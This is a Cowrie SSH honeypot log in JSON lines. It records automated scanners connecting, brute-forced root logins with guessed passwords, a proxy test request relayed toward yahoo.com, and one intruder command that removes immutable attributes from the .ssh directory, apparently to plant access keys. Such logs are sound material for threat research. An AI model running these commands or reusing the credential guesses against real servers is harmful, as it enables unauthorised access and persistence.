{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:09:17.373084Z","src_ip":"212.227.125.160","session":"73715040eb1a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:09:17.490721Z","src_ip":"27.112.78.245","session":"73197adda564"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:17.760161Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:17.762130Z","src_ip":"27.112.78.245","session":"73197adda564"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:18.007116Z","src_ip":"212.227.125.160","session":"73715040eb1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28430,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8aee7ecb149","protocol":"ssh","message":"New connection: 212.227.125.160:28430 (1.2.3.4:22) [session: a8aee7ecb149]","sensor":"my-vps","timestamp":"2025-08-26T00:09:18.124474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:09:18.315119Z","src_ip":"212.227.125.160","session":"a8aee7ecb149"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:09:18.315812Z","src_ip":"212.227.125.160","session":"a8aee7ecb149"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:19.010507Z","src_ip":"212.227.125.160","session":"a8aee7ecb149"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28436,"dst_ip":"1.2.3.4","dst_port":22,"session":"45660e636601","protocol":"ssh","message":"New connection: 212.227.125.160:28436 (1.2.3.4:22) [session: 45660e636601]","sensor":"my-vps","timestamp":"2025-08-26T00:09:19.120099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:09:19.311930Z","src_ip":"212.227.125.160","session":"45660e636601"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:09:19.312736Z","src_ip":"212.227.125.160","session":"45660e636601"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:19.977779Z","src_ip":"212.227.125.160","session":"45660e636601"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41515,"dst_ip":"1.2.3.4","dst_port":22,"session":"f38d8edf9d2a","protocol":"ssh","message":"New connection: 213.209.150.239:41515 (1.2.3.4:22) [session: f38d8edf9d2a]","sensor":"my-vps","timestamp":"2025-08-26T00:09:35.664910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:09:35.666593Z","src_ip":"213.209.150.239","session":"f38d8edf9d2a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:09:35.713689Z","src_ip":"213.209.150.239","session":"f38d8edf9d2a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:09:35.948929Z","src_ip":"213.209.150.239","session":"f38d8edf9d2a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":2215,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2215","sensor":"my-vps","timestamp":"2025-08-26T00:09:35.997165Z","session":"f38d8edf9d2a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:09:36.044878Z","src_ip":"213.209.150.239","session":"f38d8edf9d2a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":28860,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:28860","sensor":"my-vps","timestamp":"2025-08-26T00:09:36.181958Z","session":"f38d8edf9d2a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:09:36.229449Z","src_ip":"213.209.150.239","session":"f38d8edf9d2a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:36.279537Z","src_ip":"213.209.150.239","session":"f38d8edf9d2a"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.111","src_port":47720,"dst_ip":"1.2.3.4","dst_port":22,"session":"122ea1f88fde","protocol":"ssh","message":"New connection: 172.236.228.111:47720 (1.2.3.4:22) [session: 122ea1f88fde]","sensor":"my-vps","timestamp":"2025-08-26T00:09:55.442714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:09:55.835566Z","src_ip":"172.236.228.111","session":"122ea1f88fde"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:09:55.836231Z","src_ip":"172.236.228.111","session":"122ea1f88fde"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:56.898389Z","src_ip":"172.236.228.111","session":"122ea1f88fde"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.111","src_port":47730,"dst_ip":"1.2.3.4","dst_port":22,"session":"4deb1573aa25","protocol":"ssh","message":"New connection: 172.236.228.111:47730 (1.2.3.4:22) [session: 4deb1573aa25]","sensor":"my-vps","timestamp":"2025-08-26T00:09:57.081359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:09:57.475367Z","src_ip":"172.236.228.111","session":"4deb1573aa25"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:09:57.476314Z","src_ip":"172.236.228.111","session":"4deb1573aa25"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:58.556057Z","src_ip":"172.236.228.111","session":"4deb1573aa25"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.111","src_port":47752,"dst_ip":"1.2.3.4","dst_port":22,"session":"d88a138f2246","protocol":"ssh","message":"New connection: 172.236.228.111:47752 (1.2.3.4:22) [session: d88a138f2246]","sensor":"my-vps","timestamp":"2025-08-26T00:09:58.725005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:09:59.034119Z","src_ip":"172.236.228.111","session":"d88a138f2246"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:09:59.034814Z","src_ip":"172.236.228.111","session":"d88a138f2246"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:00.079603Z","src_ip":"172.236.228.111","session":"d88a138f2246"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53062,"dst_ip":"1.2.3.4","dst_port":22,"session":"cad1c2492f51","protocol":"ssh","message":"New connection: 212.227.235.229:53062 (1.2.3.4:22) [session: cad1c2492f51]","sensor":"my-vps","timestamp":"2025-08-26T00:10:12.655897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:10:13.120516Z","src_ip":"212.227.235.229","session":"cad1c2492f51"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:10:13.121276Z","src_ip":"212.227.235.229","session":"cad1c2492f51"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:14.209342Z","src_ip":"212.227.235.229","session":"cad1c2492f51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53072,"dst_ip":"1.2.3.4","dst_port":22,"session":"c00d4a602d2e","protocol":"ssh","message":"New connection: 212.227.235.229:53072 (1.2.3.4:22) [session: c00d4a602d2e]","sensor":"my-vps","timestamp":"2025-08-26T00:10:14.466850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:10:14.885772Z","src_ip":"212.227.235.229","session":"c00d4a602d2e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:10:14.886652Z","src_ip":"212.227.235.229","session":"c00d4a602d2e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:15.986765Z","src_ip":"212.227.235.229","session":"c00d4a602d2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53078,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c0b7a499f4a","protocol":"ssh","message":"New connection: 212.227.235.229:53078 (1.2.3.4:22) [session: 8c0b7a499f4a]","sensor":"my-vps","timestamp":"2025-08-26T00:10:16.213909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:10:16.493450Z","src_ip":"212.227.235.229","session":"8c0b7a499f4a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:10:16.494268Z","src_ip":"212.227.235.229","session":"8c0b7a499f4a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:17.585385Z","src_ip":"212.227.235.229","session":"8c0b7a499f4a"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":59688,"dst_ip":"1.2.3.4","dst_port":22,"session":"34fb1208350f","protocol":"ssh","message":"New connection: 27.112.78.245:59688 (1.2.3.4:22) [session: 34fb1208350f]","sensor":"my-vps","timestamp":"2025-08-26T00:10:36.867268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:10:36.868334Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:10:37.132826Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.login.success","username":"root","password":"2wsx#EDC2wsx","message":"login attempt [root/2wsx#EDC2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:10:38.253986Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:10:38.839250Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:10:38.839949Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:10:38.841258Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:39.107130Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:10:39.654006Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
